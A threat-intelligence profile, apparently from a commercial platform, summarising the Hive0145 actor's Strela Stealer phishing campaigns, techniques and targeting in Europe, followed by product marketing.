Hive0145
Hive0145 is a financially motivated threat actor assessed to be an initial access broker (IAB) and likely the sole operator behind Strela Stealer campaigns since at least 2022. The group has conducted ongoing phishing campaigns across Europe, with primary targeting observed in Spain, Germany, and Ukraine, and has also been reported targeting Italy in Strela Stealer activity. Hive0145 uses stolen authentic invoice emails and previously exfiltrated email credentials to improve phishing credibility, including an "attachment hijacking" technique in which the original email body is preserved while the attachment is replaced with a malicious payload and the sender details are tailored to the next victim. Campaigns commonly use invoice or receipt lures, encrypted ZIP archives with per-email passwords, and archives containing heavily obfuscated JavaScript downloaders that retrieve and execute crypted Strela Stealer DLLs, often via WebDAV and rundll32.exe. Hive0145 has iterated on delivery and evasion techniques since late 2022. Reported methods include use of polyglot files, valid code-signing certificates, uncommon executable extensions such as .com and .pif, and a custom crypter/loader referred to as Stellar Crypter or Stellar Loader. IBM X-Force reported the actor may automate harvesting, weaponizing, packaging, and sending phishing emails, supported by a steady supply of freshly stolen emails. Recent Strela Stealer variants added host profiling through system and installed-application enumeration, as well as expanded language and locale checks including Ukrainian. Strela Stealer is designed to steal credentials from Microsoft Outlook and Mozilla Thunderbird, including Thunderbird profile data and Outlook IMAP credentials, and exfiltrates the data over HTTP POST to hardcoded command-and-control infrastructure. The stolen credentials are used to fuel subsequent phishing waves, and reporting assesses this activity supports Hive0145’s role as an IAB. Separate reporting states that another actor, Detour Dog, acted as a service provider or partner distributing Strela Stealer for Hive0145 via the StarFish backdoor, while Hive0145 remained the operator of the stealer malware. Known alias in the provided content: hive0145.
Know when an actor pivots toward your sector
Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.
Associated malware families
3 malware families attributed to this actor across reporting.
Observables
4 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting. View more in app.
Recent activity
5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Financially motivated actor assessed as the exclusive operator behind Strela Stealer campaigns since at least 2022; likely acts as an initial access broker acquiring and selling access to compromised systems.
Hive0145 is a cybercriminal group operating the Strela Stealer malware, which is distributed via partnerships with other groups such as Detour Dog.
Ongoing campaign delivering StrelaStealer malware to victims in Europe, extracting credentials from Microsoft Outlook and Mozilla Thunderbird via phishing emails using stolen invoice notifications.
Hive0145 is a criminal group conducting phishing campaigns across Europe using Strela Stealer malware to steal email credentials and propagate further attacks.
The version that knows your environment.
Match sector + geo + tech-stack targeting against your real footprint.
Every observed MITRE ATT&CK technique, grouped by tactic.
Families this actor is known to deploy, with IOCs and behavior.
CVEs this actor has used in known campaigns.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Domains, IPs, and hashes tied to this actor, refreshed continuously.